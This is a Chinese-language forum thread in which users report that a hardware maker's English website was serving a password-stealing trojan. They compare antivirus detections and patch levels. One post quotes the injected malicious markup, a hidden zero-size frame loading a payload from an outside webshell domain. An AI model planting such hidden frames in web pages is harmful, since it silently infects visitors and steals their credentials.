青雲英文官網被放木馬了...=.=+
 

http://www.albatron.com.tw/

掃描類型： 即時防護掃描
事件： 發現病毒！
病毒名稱：PWSteal.Trojan
檔案： C:\WINDOWS\Temporary Internet Files\Content.IE5\4TUN0HYV\icyfox[1].exe
位置： C:\WINDOWS\Temporary Internet Files\Content.IE5\4TUN0HYV

OH MY GOD!!
放木馬對象從遊戲網站漫延到硬體網站了嗎!!

沒有阿
我的kav沒有偵測到ㄝ
怎麼回事

剛剛進去..
查原始檔....

最下面
frame width=0 height=0 src=http://webshell.cn/tw/tw1_1.htx

Pc-cillin 2004 沒動作...-_-||
不過用搜尋找整個 HDD (含隱藏目錄).並沒有發現 icyfox[1].exe 這個檔

OS: Winxp SP2
Antivirus: Pc-cillin 2004 ver. 11.00 build 1264
引擎版本 7.100
病毒碼 2.22.00

真的有木馬

基本上
回報時
至少要寫
OS, BROWSER, ANTI-VIRUS的名稱與版本 (安全設定值就免了)
有沒經過PATCH或UPDATE
不然參考性會大大縮減

確實有被放木馬
因為我重過兩次
一次桌機
一次NB
回想後才發現
都有經過青雲英文官網
因為要下載BIOS
沒想到到現在還沒被發現
青雲真不是普通的爛啊....

糟糕，我的也沒發現不過用的是舊版Kav4.5，不過沒有4TUN0HYV這個目錄
應該是沒被感染，對2000無效嗎？

他是透過ie漏洞執行iframe殖入的..
有更新Q867801的應該不會被感染..
之前是學校的98電腦,IE5.0,防毒軟體是NAV corp.

測不出來
 

下載最新版本 KAV 5.X
更新完成後連上官網,完全沒反應??
檢視原始檔案,的確有看到那幾個連結.
但是直接用 IE 去連結,都看不到??
原本有用 NAV 企業版 8.0 也都沒有反應??
到底是誤判或者是真的有呢??

OS: XP SP2
IE : IE 6.0.2900.2180
ANTIVIRUS : KAV 5.0.156 OR SAV 8.00.9374

真奇怪????

SP2已經有更新Q867801過
所以測不出來應該是正常的